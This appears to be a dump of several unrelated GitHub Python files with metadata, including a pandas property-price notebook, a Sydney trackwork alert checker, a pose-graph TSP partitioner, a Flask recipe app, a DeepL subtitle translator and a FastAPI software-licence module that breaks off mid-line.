[\"total\"]\nmas_publicadas=mas_publicadas.sort_values(\"total\", ascending=False).head(100)\nmas_publicadas.reset_index(inplace=True)\nprint(mas_publicadas)\n\n\n# In[20]:\n\n\nlista_de_ciudades = mas_publicadas.ciudad\nlista_de_ciudades = lista_de_ciudades.to_list()\nlista_de_ciudades\ndf=df[df[\"ciudad\"].isin(lista_de_ciudades)]\ndf\n\n\n# In[21]:\n\n\n#Realizo un calculo del promedio del valor del metro cuadrado por \npor_ciudad=df.groupby(\"ciudad\").agg({\"metrostotales\":\"sum\"})\npor_ciudad=por_ciudad.loc[por_ciudad.metrostotales != 0.0]\npor_ciudad[\"precios\"] = df.groupby(\"ciudad\").agg({\"precio\":\"sum\"})\npor_ciudad[\"valormetrocuadrado\"] = por_ciudad[\"precios\"] / por_ciudad[\"metrostotales\"]\npor_ciudad.reset_index(inplace=True)\n\n\n# ### Limpio el dataset de valores nulos en metrostotales y/o precios\n\n# In[22]:\n\n\npor_ciudad=por_ciudad.loc[(por_ciudad.metrostotales != 0.0)]\npor_ciudad=por_ciudad.loc[(por_ciudad.precios != 0.0)]\npor_ciudad = por_ciudad.sort_values(\"valormetrocuadrado\")\npor_ciudad.reset_index(drop=True, inplace=True)\npor_ciudad\n\n\n# # Busco las ciudades extremo, la más cara y la más barata\n\n# ### Ahora armo un dataframe con las 10 ciudades más caras y las 10 más baratas.\n\n# In[23]:\n\n\ntop_10_ciudades_mas_caras = por_ciudad.tail(10)\ntop_10_ciudades_mas_caras.reset_index(drop=True, inplace=True)\n\n\n# In[24]:\n\n\ntop_10_ciudades_mas_baratas = por_ciudad.head(10)\ntop_10_ciudades_mas_baratas.reset_index(inplace=True)\n\n\n# In[25]:\n\n\nvertical_stack = pd.concat([top_10_ciudades_mas_baratas, top_10_ciudades_mas_caras], axis=0, sort=False)\nvertical_stack.reset_index(drop=True, inplace=True)\nvertical_stack\nbar_plot(vertical_stack[\"valormetrocuadrado\"])\n\n\n# In[ ]:\n\n\nciudad_mas_barata = (top_10_ciudades_mas_baratas.loc[0,:].ciudad,top_10_ciudades_mas_baratas.loc[0,:].valormetrocuadrado)\nprint(\"Ciudad mas barata {}\".format(ciudad_mas_barata))\nciudad_mas_cara = (top_10_ciudades_mas_caras.loc[0,:].ciudad,top_10_ciudades_mas_caras.loc[0,:].valormetrocuadrado)\nprint(\"Ciudad mas cara {}\".format(ciudad_mas_cara))\namplitud = ciudad_mas_cara[1] - ciudad_mas_barata[1]\nprint(\"Amplitud de precio {}\".format(amplitud))\n\n\n# In[ ]:\n\n\ntiene_gps= df[~(df['gps'].isnull())]\ntiene_gps=tiene_gps.groupby('ciudad').agg({\"lat\":\"mean\",\"lng\":\"mean\"})\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"unmateo/7506-TP","sub_path":"src/tp1/lab/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37731673639","text":"import requests\nfrom pytz import timezone\nimport config\nfrom datetime import datetime, timedelta\n\n# Check if its occuring within next 4 and 5 days and on weekend\ndef correctDates(date):\n now = datetime.now(timezone('Australia/Sydney'))\n next_4_days = now + timedelta(days=4)\n next_5_days = now + timedelta(days=5)\n return (next_4_days <= date < next_5_days) and date.weekday() >=4\n\n# Check if alerts refer to trackwork service\ndef correctAlerts(entry):\n return entry['alert']['cause'] == 'MAINTENANCE' and entry['alert']['effect'] == 'MODIFIED_SERVICE'\n\n# Check if trackwork is for North Shore Line (Cause we all live on it)\ndef includesRelatedLines(entry):\n for trainLine in entry['informedEntity']:\n if trainLine['routeId'][0:3] == 'NSN':\n filterText = \"T1 North Shore Line:\"\n if filterText in entry['headerText']['translation'][0]['text']:\n return True\n return False\n\ndef noTrackWork(output):\n return True if 'entity' not in output else False\n\ndef getNewTrackWork():\n api_url = \"https://api.transport.nsw.gov.au/v2/gtfs/alerts/sydneytrains?format=json\"\n response = requests.get(api_url, headers={'Authorization': f'apikey {config.api_key}'})\n output = response.json()\n if noTrackWork(output):\n return None\n for entry in output['entity']:\n startTime = int(entry['alert']['activePeriod'][0]['start'])\n dateTime = datetime.fromtimestamp(startTime, timezone('Australia/Sydney'))\n if (correctDates(dateTime) and correctAlerts(entry) and includesRelatedLines(entry['alert'])):\n # Return the trackwork message\n return entry['alert']['descriptionText']['translation'][0]['text']\n return None\n\ndef getNewMetroTrackWork():\n api_url = \"https://api.transport.nsw.gov.au/v2/gtfs/alerts/metro?format=json\"\n response = requests.get(api_url, headers={'Authorization': f'apikey {config.api_key}'})\n output = response.json()\n # Check if there's any trackwork at all\n if noTrackWork(output):\n return None\n for entry in output['entity']:\n startTime = int(entry['alert']['activePeriod'][0]['start'])\n dateTime = datetime.fromtimestamp(startTime, timezone('Australia/Sydney'))\n if (correctDates(dateTime) and correctAlerts(entry)):\n # Return the trackwork message\n return entry['alert']['descriptionText']['translation'][0]['text']\n return None\n\nif __name__ == \"__main__\":\n getNewMetroTrackWork()\n","repo_name":"Jevelry/TrackworkBot","sub_path":"trackworkChecker.py","file_name":"trackworkChecker.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1022472967","text":"from pose_graph_partitioning.pose_graph import *\ndef cvt_tsp(pg, start_points=None, agent_num=-1, random_weight = True):\n if len(pg.id2index) == 0:\n print(\"You must run setup_graph first\")\n return\n\n force_starts = start_points is not None\n min_size = 3\n max_size = len(pg.keyframes)*2\n if force_starts:\n agent_num = len(start_points)\n sp_set = set()\n for _id in start_points:\n sp_set.add(pg.id2index[_id])\n print(\"start index\", sp_set)\n \n keyframe_num = len(pg.keyframes)\n\n max_weight = 1000000\n min_weight = - 1000\n with open(\"mtsp.par\", \"w\") as f:\n print(f\"\"\"SPECIAL\nPROBLEM_FILE=problem.tsp\nSALESMEN = {agent_num}\nMTSP_OBJECTIVE = MINSUM\nMTSP_MIN_SIZE = {min_size}\nMTSP_MAX_SIZE = {max_size}\nRUNS = 5\nTOUR_FILE = mtsp.tour\nMTSP_SOLUTION_FILE=mtsp.sol\nTRACE_LEVEL =0\"\"\",file=f)\n\n weight_mat = \"\"\n # We will set a virtual start point on index agent id\n # The weight from virtual start point to some start point is -100000\n dim = keyframe_num+1\n weight = np.ones((dim, dim), dtype=np.int)*max_weight\n for _i in range(dim):\n for _j in range(dim):\n i = _i - 1\n j = _j - 1\n if i == -1:\n if force_starts:\n if j in sp_set:\n weight[_i, _j] = min_weight\n else:\n weight[_i, _j] = min_weight\n \n if j == -1:\n weight[_i, _j] = min_weight\n elif i >=0 and j >=0 and pg.has_edge(pg.index2id[i], pg.index2id[j]):\n if random_weight:\n weight[_i, _j] = random.randint(-10, 10)\n else:\n weight[_i, _j] = 0\n \n\n for i in range(dim):\n for j in range(dim):\n weight_mat += f\"{weight[i, j]}\\t\"\n weight_mat += \"\\n\"\n\n with open(\"problem.tsp\", \"w\") as f:\n print(f\"\"\"NAME : mtsp\nTYPE: ATSP\nDIMENSION: {dim}\nEDGE_WEIGHT_TYPE : EXPLICIT\nEDGE_WEIGHT_FORMAT : FULL_MATRIX\nEDGE_WEIGHT_SECTION\n{weight_mat}\"\"\", file=f)\n\ndef solve_tsp():\n s = os.popen('LKH mtsp.par')\n output = s.read()\n print(\"LKH:\")\n pathes = []\n with open(\"mtsp.sol\", \"r\") as f:\n lines = f.readlines()\n for i in range(2, len(lines)):\n line = lines[i]\n path = []\n c = 0\n for item in line.split(' '):\n if item == \"1\":\n c += 1\n if c < 2:\n path.append(int(item)-2)\n else:\n break\n pathes.append(path[1:])\n print(f\"Read {len(pathes)} pathes from TSP solution\")\n return pathes\n\ndef make_edge(kfa, kfb):\n pos = kfb.pos - kfa.pos\n pos = quaternion_rotate(quaternion_inverse(kfa.quat), pos)\n quat = quaternion_multiply(quaternion_inverse(kfa.quat), kfb.quat)\n quat = unit_vector(quat)\n edge = Edge(kfa.keyframe_id, kfb.keyframe_id, pos, quat, False, False)\n return edge\n\ndef fix_path_disconnected(pg, pathes, pg_optimized, align_beginning=False):\n count_disconnected = 0\n for path in pathes:\n for i in range(0, len(path)-1):\n _ida = pg.index2id[path[i]]\n _idb = pg.index2id[path[i+1]]\n if not pg.has_edge(_ida, _idb):\n count_disconnected += 1\n kfa = pg_optimized.keyframes[_ida]\n kfb = pg_optimized.keyframes[_idb]\n edge = make_edge(kfa, kfb)\n edge.information_matrix = pg.edges[0].information_matrix\n pg.edges.append(edge)\n \n path_num = len(pathes)\n if align_beginning:\n for i in range(path_num-1):\n _ida = pg.index2id[pathes[i][0]]\n _idb = pg.index2id[pathes[i+1][0]]\n if not pg.has_edge(_ida, _idb):\n count_disconnected += 1\n kfa = pg_optimized.keyframes[_ida]\n kfb = pg_optimized.keyframes[_idb]\n edge = make_edge(kfa, kfb)\n edge.information_matrix = pg.edges[0].information_matrix\n pg.edges.append(edge)\n\n pg.update_edges()\n print(f\"Fix {count_disconnected} disconnected edges now edges {len(pg.edges)}\")\n\ndef generate_path_tsp(pg, agent_num, random_weight = True, pg_optimized = None, fix_path=True, align_beginning=True, pathes=None):\n if pathes is None:\n cvt_tsp(pg, agent_num = agent_num, random_weight = random_weight)\n pathes = solve_tsp()\n if fix_path:\n fix_path_disconnected(pg, pathes, pg_optimized, align_beginning = align_beginning)\n index_part = {}\n for i in range(len(pathes)):\n for index in pathes[i]:\n index_part[index] = i\n cut, vol, min_keyframes, max_keyframes = pg.repart(agent_num, index_part)\n for _index in index_part:\n pg.keyframes[pg.index2id[_index]].drone_id = index_part[_index]\n print(f\"TSP new path keyframes {min_keyframes}<->{max_keyframes} cut {cut} comm_vol {vol}\")\n return pathes\n","repo_name":"HKUST-Aerial-Robotics/D2SLAM","sub_path":"d2pgo/scripts/pose_graph_partitioning/tsp_dataset_generation.py","file_name":"tsp_dataset_generation.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","stars":175,"dataset":"github-code","pt":"53"} +{"seq_id":"11315752695","text":"def diStringMatch(S: str):\n \"\"\"\n Given a string S that only contains \"I\" (increase) or \"D\" (decrease), let N = S.length.\n\n Return any permutation A of [0, 1, ..., N] such that for all i = 0, ..., N-1:\n\n If S[i] == \"I\", then A[i] < A[i+1]\n If S[i] == \"D\", then A[i] > A[i+1]\n >>> diStringMatch(\"IDID\")\n [0, 4, 1, 3, 2]\n >>> diStringMatch(\"III\")\n [0, 1, 2, 3]\n >>> diStringMatch(\"DDI\")\n [3, 2, 0, 1]\n\n \"\"\"\n start = 0\n end = len(S)\n res = []\n for char in S:\n if char == 'I':\n res.append(start)\n start += 1\n else:\n res.append(end)\n end -= 1\n res.append(end)\n return res\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod(verbose=True)","repo_name":"AlexVines/my_leetcode_solutions","sub_path":"di_match.py","file_name":"di_match.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5687363476","text":"import datetime\nimport configparser\n\nfrom requests import get\nimport json\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nfrom pyfcm import FCMNotification\nimport playSound\n\n\nclass UseFirebase:\n # 설정 불러오기.\n private_config = configparser.ConfigParser()\n config = configparser.ConfigParser()\n private_config.read(\"private_config.ini\", encoding=\"utf-8\")\n config.read(\"config.ini\", encoding=\"utf-8\")\n # 클라이언트 토큰을 NAS에서 다운로드 후 저장.\n with open(\"client_token.txt\", \"wb\") as file: # open in binary mode\n response = get(private_config[\"firebase_cloudmessaging\"][\"TOKEN_URL\"]) # get request\n print(\"download\")\n file.write(response.content) # write to file\n\n cred = credentials.Certificate(private_config[\"Firebase\"][\"KEY\"])\n # Initialize the app with a service account, granting admin privileges\n firebase_admin.initialize_app(cred, {\n 'databaseURL': private_config[\"Firebase\"][\"databaseURL\"]\n })\n\n token_list = []\n with open(\"client_token.txt\", \"r\") as r:\n token_list = r.readlines()\n CLOUDMESSAGING_APIKEY = private_config[\"firebase_cloudmessaging\"][\"APIKEY\"]\n\n @classmethod\n def cloudMessaging(cls, student_id, data, result):\n # 파이어베이스 콘솔에서 얻어 온 서버 키를 넣어 줌\n push_service = FCMNotification(cls.CLOUDMESSAGING_APIKEY)\n\n def sendMessage(body, title):\n # 메시지 (data 타입)\n data_message = {\n \"body\": body,\n \"title\": title\n }\n # 토큰값을 이용해 등록한 사용자에게 푸시알림을 전송함\n for token in cls.token_list:\n token = token.split(\"\\n\")[0]\n result = push_service.notify_single_device(registration_id=token, message_title=title,\n message_body=body)\n\n # 전송 결과 출력\n print(\"클라우드 메시징 전송 결과 : \", result)\n\n if result == 1:\n sendMessage(data[student_id][\"id\"], \"출석 완료\")\n elif result == 2:\n sendMessage(data[student_id][\"id\"], \"[주의] 미열\")\n elif result == 3:\n sendMessage(data[student_id][\"id\"], \"[주의] 고열\")\n elif result == 0:\n sendMessage(data[student_id][\"id\"], \"출석 오류\")\n\n # 테이블명 : 날짜_교시_과목코드\n @classmethod\n def updateData(cls, ref_dir, student_id, data):\n # json 데이터를 저장하기 위해 id를 key로 사용.\n data = {student_id: data}\n ref = db.reference(ref_dir)\n # id 조회를 위해 student_id 데이터가 있는지 확인.\n snapshot = db.reference(ref_dir + \"/\" + student_id)\n temp = json.loads(json.dumps(snapshot.get()))\n print(\"id 조회결과 :\", temp)\n # 정상처리된 사용자는 데이터 입력안함.\n if temp and temp[\"result\"] == 1:\n print(\"이미 출석한 사용자 입니다.\")\n playSound.playSound.play(\"sound/audio_4.wav\")\n return\n # 데이터 입력.\n ref.update(data)\n cls.cloudMessaging(student_id, data, data[student_id][\"result\"])\n print(id, \"학생 추가완료\")\n\n # 학생 정보가 있는지 확인해주는 메소드.\n @staticmethod\n def isChecked(ref_dir, student_id):\n student = db.reference(ref_dir + \"/\" + student_id).get()\n if student:\n return student[\"result\"]\n else:\n return 0\n\n\nif __name__ == \"__main__\":\n stu_id = \"21660074\"\n test_data = {\n \"id\": stu_id,\n \"time\": \"1234\",\n \"result\": 1,\n \"temp\": \"36.5\"\n }\n dir1 = \"210321_2_K0125146\"\n UseFirebase.updateData(dir1, stu_id, test_data)\n print(\"isChecked:\", UseFirebase.isChecked(dir1, stu_id))\n","repo_name":"Leekm0912/3-1_SmartAttendance","sub_path":"UseFirebase.py","file_name":"UseFirebase.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5352883492","text":"from unittest import mock\n\nimport twittback\nimport twittback.presenter\n\n\ndef test_insert_spans():\n tweet = twittback.Tweet(twitter_id=1, text=\"Talking to @bob about #stuff\")\n expected_url = \"http://example.com/search?pattern=stuff\"\n app = mock.Mock()\n app.url_for = mock.Mock()\n app.url_for.return_value = \"http://example.com/search?pattern=stuff\"\n html_tweet = twittback.presenter.HTMLTweet(app, tweet, \"my_user\")\n expected = \"<pre>\"\n expected += \"Talking to \"\n expected += '<span class=\"handle\">@bob</span> '\n expected += \"about \"\n expected += '<a class=\"hashtag\" href=\"%s\">#stuff</a>' % expected_url\n expected += \"</pre>\"\n assert html_tweet.html == expected\n\n\ndef test_do_not_break_urls():\n tweet = twittback.Tweet(twitter_id=1, text=\"http://example.com#1 has an anchor\")\n app = mock.Mock()\n html_tweet = twittback.presenter.HTMLTweet(app, tweet, \"my_user\")\n expected = \"<pre>\"\n expected += \"http://example.com#1 has an anchor\"\n expected += \"</pre>\"\n assert html_tweet.html == expected\n","repo_name":"iveskins/twittback","sub_path":"twittback/test/test_presenter.py","file_name":"test_presenter.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7527560127","text":"import os\nfrom flask import (\n Flask, flash, render_template,\n redirect, request, session, url_for)\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\nif os.path.exists(\"env.py\"):\n import env\n\n\napp = Flask(__name__)\n\napp.config[\"MONGO_DBNAME\"] = os.environ.get(\"MONGO_DBNAME\")\napp.config[\"MONGO_URI\"] = os.environ.get(\"MONGO_URI\")\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n\nmongo = PyMongo(app)\n\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n add_recipes = mongo.db.add_recipes.find()\n return render_template(\"index.html\", add_recipes=add_recipes)\n\n\n@app.route(\"/add_recipes\", methods=[\"GET\", \"POST\"])\ndef add_recipes():\n if request.method == \"POST\":\n recipe = {\n \"author\": request.form.get(\"author\"),\n \"recipe_name\": request.form.get(\"recipe_name\"),\n \"image_url\": request.form.get(\"image_url\"),\n \"description\": request.form.get(\"description\"),\n \"preptime\": request.form.get(\"preptime\"),\n \"bakingtime\": request.form.get(\"bakingtime\"),\n \"serves\": request.form.get(\"serves\"),\n \"ingredients\": request.form.get(\"ingredients\").split('\\r\\n'),\n \"method\": request.form.get(\"method\").split('\\r\\n')\n }\n mongo.db.add_recipes.insert_one(recipe)\n flash(\"Recipe Uploaded\")\n return redirect(url_for(\"add_recipes\"))\n return render_template(\"add_recipes.html\")\n\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef search():\n if request.method == \"POST\":\n query = request.form.get(\"query\")\n add_recipes = mongo.db.add_recipes.find({\"$text\": {\"$search\": query}})\n return render_template(\"search.html\", add_recipes=add_recipes)\n else:\n return render_template(\"search.html\")\n\n\n@app.route(\"/view_more/<recipe_id>\")\ndef view_more(recipe_id):\n recipe = mongo.db.add_recipes.find_one({\"_id\": ObjectId(recipe_id)})\n print(recipe)\n return render_template(\"view_more.html\", recipe=recipe)\n\n\n@app.route(\"/update_recipe/<recipe_id>\", methods=[\"GET\", \"POST\"])\ndef update_recipe(recipe_id):\n if request.method == \"POST\":\n ingredientsArray = []\n methodArray = []\n for key in request.form:\n if key == \"ingredients\":\n value = request.form[key]\n ingredientsArray.append(value)\n if key == \"method\":\n value = request.form[key]\n methodArray.append(value)\n submit = {\n \"author\": request.form.get(\"author\"),\n \"recipe_name\": request.form.get(\"recipe_name\"),\n \"image_url\": request.form.get(\"image_url\"),\n \"description\": request.form.get(\"description\"),\n \"preptime\": request.form.get(\"preptime\"),\n \"bakingtime\": request.form.get(\"bakingtime\"),\n \"serves\": request.form.get(\"serves\"),\n \"ingredients\": ingredientsArray,\n \"method\": methodArray\n }\n mongo.db.add_recipes.update({\"_id\": ObjectId(recipe_id)}, submit)\n flash(\"Recipe Updated\")\n return redirect(url_for('index'))\n\n recipe = mongo.db.add_recipes.find_one({\"_id\": ObjectId(recipe_id)})\n return render_template(\"update_recipe.html\", recipe=recipe)\n\n\n@ app.route(\"/delete_recipe/<recipe_id>\")\ndef delete_recipe(recipe_id):\n mongo.db.add_recipes.remove({\"_id\": ObjectId(recipe_id)})\n flash(\"Recipe Deleted\")\n return redirect(url_for(\"add_recipes\"))\n\n\nif __name__ == \"__main__\":\n app.run(host=os.environ.get(\"IP\"),\n port=int(os.environ.get(\"PORT\")),\n debug=True)\n","repo_name":"Amiejohnstone18/The_Baking_Book","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6890073235","text":"# -*- coding: utf-8 -*-\n# Thanks to the people at Hacklab Kika and the people on stackoverflow that helped me fix some of the bugs I encountered during writing this.\n\nimport argparse\nimport pysrt \nimport os\nimport shutil\nimport sys\nimport time\nfrom datetime import datetime\nimport tempfile\nimport asyncio\n\n# Now this is where all the fun begins\t\n\nasync def puppeteer(elements, to_lang, from_lang):\n\tfrom deepl_scraper_pp.deepl_tr import deepl_tr\n\tcoros = [await deepl_tr(elem['text'], to_lang=to_lang, from_lang=from_lang) for elem in elements ]\n\treturn coros\n\ndef translate(input, output, languagef, languaget, api_key):\n\t\"\"\"\n\tTranslate each subtitle block\n\t\"\"\"\n\n\tif api_key:\n\t\tprint(\"Using Deepl's API. Should be faster.\")\n\t\tfrom deep_translator import DeepL\n\telse:\n\t\tprint('Scraping Deepl, this may take some time....')\n\t\tloop = asyncio.get_event_loop()\n\n\tsubs = pysrt.open(input)\n\telements = []\n\telements_translated = []\n\tfor index, sub in enumerate(subs):\n\t\tentry = {'index': sub.index, 'start_time': sub.start, 'end_time': sub.end, 'text': sub.text}\n\t\telements.append(entry)\n\t\telements_translated.append(entry)\n\n\tcounter = 20\n\tsecond_counter = 0\n\twhile elements != []:\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tif not api_key:\n\t\t\t\t\ttranslatedSentences = loop.run_until_complete(asyncio.gather(puppeteer(elements[:counter], languaget, languagef), return_exceptions=True))\n\t\t\t\t\ttranslatedSentences = translatedSentences[0]\n\t\t\t\telse:\n\t\t\t\t\ttranslatedSentences = Deepl(api_key, source=languagef, target=languaget).translate_batch(elements[:counter])\n\t\t\texcept:\n\t\t\t\ttranslatedSentences = [None for elem in range(counter)]\n\n\t\t\tfor sentence in translatedSentences:\n\t\t\t\ttry:\n\t\t\t\t\telements_translated[second_counter]['text'] = sentence\n\t\t\t\t\tprint(f\"{elements_translated[second_counter]['index']}. -> {elements_translated[second_counter]['text']}\")\n\t\t\t\t\tsecond_counter+=1\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\t\t\tdel elements[:counter]\n\t\t\tbreak\n\n\tprint(elements)\n\twith open(output, 'w') as fileresp: # Use w mode instead\n\t\tfor element in elements_translated:\n\t\t\ttry:\n\t\t\t\tprint(f\"{element['start_time']} {element['text']}\")\n\t\t\t\tfileresp.write(f\"{element['index']}\\n{element['start_time']} --> {element['end_time']}\\n{element['text']}\\n\\n\")\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\tfileresp.close()\n\ndef parsefiles(inputFile, outputFile, languageFrom, languageTo, api_key):\n\tif inputFile == None:\n\t\tprint(\"Input file not specified! Exiting...\")\n\t\tsys.exit(2)\n\tif languageTo == None:\n\t\tprint(\"Language not specified! Exiting...\")\n\t\tsys.exit(2)\n\n\tif outputFile == None:\n\t\toutputFile = inputFile + languageTo + '.srt'\n\n\ttempFile = tempfile.NamedTemporaryFile(suffix='.srt',delete=False)\n\tshutil.copyfile(inputFile,tempFile.name)\n\tshutil.copyfile(inputFile, outputFile) \n\t# Due to a bug that files cannot be accessed I had to move everything to another function\n\ttranslate(inputFile, outputFile, languageFrom, languageTo, api_key)\n\ndef main():\n\t# Parse Arguments\n\tparser = argparse.ArgumentParser(description='Python Program that translates a subtitle file using deepl')\n\tparser.add_argument('-i', '--input-file', action=\"store\", help=\"takes the input file\", metavar=\"FILE\")\n\tparser.add_argument('-o', '--output-file', action=\"store\", help=\"takes the output file\", metavar=\"FILE\")\n\tparser.add_argument('-lf', '--language-from', action=\"store\", help=\"language to translate from\", default=\"auto\")\n\tparser.add_argument('-lt', '--language-to', action=\"store\", help=\"language to translate to\")\n\tparser.add_argument('-a', '--api-key', action=\"store\", help=\"Deepl API Key - Optional\")\n\targs = parser.parse_args()\n\tparsefiles(args.input_file, args.output_file, args.language_from, args.language_to, args.api_key)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"MatejMecka/captionsTranslator","sub_path":"captionsTranslator.py","file_name":"captionsTranslator.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"44087906922","text":"from fastapi import HTTPException, status\n\nfrom .schemas import ModuleCreate, LicenceCreate, SoftwareCreate, EmployeeLicenceCreate, EmployeeLicenceUpdate, \\\n SoftwareUpdate, SoftwareDB, Software, ModuleDB, ModuleUpdate, LicenceDB, Licence, LicenceUpdate, \\\n EmployeeLicenceDB, SoftwareModulesCreate, SoftwareModulesDB, SoftwarePage, \\\n SoftwareWithModulesCreate, LicencePage, ClientLicenceDB, ClientLicenceCreate\nfrom ..accounts.client_account.models import clients\nfrom ..accounts.client_account.schemas import ClientDB\nfrom ..db.db import database\nfrom .models import softwares, modules, licences, employee_licences, software_modules, client_licences\nfrom ..errors import Errors\nfrom typing import List, Optional\n\n\nasync def get_software_list(last_id: int = 0, limit: int = 9) -> List[Software]:\n query = softwares.select().where(softwares.c.id > last_id).limit(limit)\n result = await database.fetch_all(query=query)\n list_of_software = []\n for software in result:\n software = dict(software)\n module = await get_software_modules(software[\"id\"])\n list_of_software.append(Software(**dict({**software, \"modules\": module})))\n return list_of_software\n\n\nasync def get_software_db_list() -> List[SoftwareDB]:\n result = await database.fetch_all(query=softwares.select())\n return [SoftwareDB(**dict(software)) for software in result]\n\n\nasync def get_software_page(last_id: int = 0, limit: int = 9) -> SoftwarePage:\n software_list = await get_software_list(last_id, limit)\n modules_list = await get_modules_db()\n return SoftwarePage(**dict({\"software_list\": software_list, \"modules_list\": modules_list}))\n\n\nasync def get_software(software_id: int) -> Optional[SoftwareDB]:\n result = await database.fetch_one(query=softwares.select().where(softwares.c.id == software_id))\n if result is not None:\n return SoftwareDB(**dict(result))\n return None\n\n\nasync def get_software_by_name(software_name: str) -> Optional[SoftwareDB]:\n result = await database.fetch_one(query=softwares.select().where(softwares.c.name == software_name))\n if result:\n return SoftwareDB(**dict(result))\n return None\n\n\nasync def get_software_with_modules(software_id: int) -> Optional[Software]:\n result = await database.fetch_one(query=softwares.select().where(softwares.c.id == software_id))\n if result is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.SOFTWARE_IS_NOT_EXIST\n )\n module = await get_software_modules(software_id)\n return Software(**dict({**dict(result), \"modules\": module}))\n\n\nasync def add_software(software: SoftwareCreate) -> SoftwareDB:\n if await get_software_by_name(software.name):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.SOFTWARE_IS_EXIST,\n )\n query = softwares.insert().values(**software.dict())\n software_id = await database.execute(query)\n return SoftwareDB(**dict({\"id\": software_id, **software.dict()}))\n\n\nasync def add_software_with_modules(software_with_modules: SoftwareWithModulesCreate) -> SoftwareDB:\n software = await add_software(SoftwareCreate(name=software_with_modules.name))\n modules_list = software_with_modules.modules\n for module_id in modules_list:\n try:\n module = await add_software_module(software.id, module_id)\n except Exception as e:\n print(e)\n return software\n\n\nasync def update_software(software_id: int, software: SoftwareUpdate) -> SoftwareDB:\n if get_software(software_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.SOFTWARE_IS_NOT_EXIST,\n )\n query = softwares.update().where(softwares.c.id == software_id).values(**software.dict())\n await database.execute(query)\n return SoftwareDB(**dict({\"id\": software_id, **software.dict()}))\n\n\nasync def delete_software(software_id: int) -> None:\n if get_software(software_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.SOFTWARE_IS_NOT_EXIST,\n )\n query = softwares.delete().where(softwares.c.id == software_id)\n await database.execute(query)\n\n\nasync def get_software_module(software_id: int, module_id: int) -> Optional[SoftwareModulesDB]:\n query = software_modules.select(). \\\n where((software_modules.c.software_id == software_id) & (software_modules.c.module_id == module_id))\n result = await database.fetch_one(query=query)\n if result:\n return SoftwareModulesDB(**dict(result))\n return None\n\n\nasync def get_software_modules(software_id: int) -> List[ModuleDB]:\n query = software_modules.select().where(software_modules.c.software_id == software_id)\n result = await database.fetch_all(query=query)\n return [await get_module(software_module.module_id) for software_module in result]\n\n\nasync def add_software_module(software_id: int, module_id: int) -> SoftwareModulesDB:\n if await get_software_module(software_id, module_id):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.MODULE_FOR_THIS_SOFTWARE_IS_EXIST,\n )\n if await get_module(module_id) is None:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.MODULE_IS_NOT_EXIST,\n )\n software_module = SoftwareModulesCreate(**dict({\"software_id\": software_id, \"module_id\": module_id}))\n query = software_modules.insert().values(software_module.dict())\n software_module_id = await database.execute(query)\n return SoftwareModulesDB(**dict({\"id\": software_module_id, **software_module.dict()}))\n\n\nasync def delete_software_module(software_id: int, module_id: int) -> None:\n if await get_software_module(software_id, module_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.MODULE_FOR_THIS_SOFTWARE_IS_NOT_EXIST,\n )\n query = software_modules.delete(). \\\n where((software_modules.c.software_id == software_id) & (software_modules.c.module_id == module_id))\n await database.execute(query)\n\n\nasync def get_modules_db() -> List[ModuleDB]:\n result = await database.fetch_all(query=modules.select())\n return [ModuleDB(**dict(module)) for module in result]\n\n\nasync def get_modules(last_id: int = 0, limit: int = 9) -> List[ModuleDB]:\n query = modules.select().where(modules.c.id > last_id).limit(limit)\n result = await database.fetch_all(query=query)\n modules_list = []\n for module in result:\n modules_list.append(ModuleDB(**dict(module)))\n return modules_list\n\n\nasync def get_module(module_id: int) -> Optional[ModuleDB]:\n result = await database.fetch_one(query=modules.select().where(modules.c.id == module_id))\n if result is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.MODULE_IS_NOT_EXIST,\n )\n return ModuleDB(**dict(result))\n\n\nasync def get_module_by_name(module_name: str) -> Optional[ModuleDB]:\n result = await database.fetch_one(query=modules.select().where(modules.c.name == module_name))\n if result is not None:\n return ModuleDB(**dict(result))\n return None\n\n\nasync def add_module(module: ModuleCreate) -> ModuleDB:\n if await get_module_by_name(module.name) is not None:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.MODULE_IS_EXIST,\n )\n query = modules.insert().values(**module.dict())\n module_id = 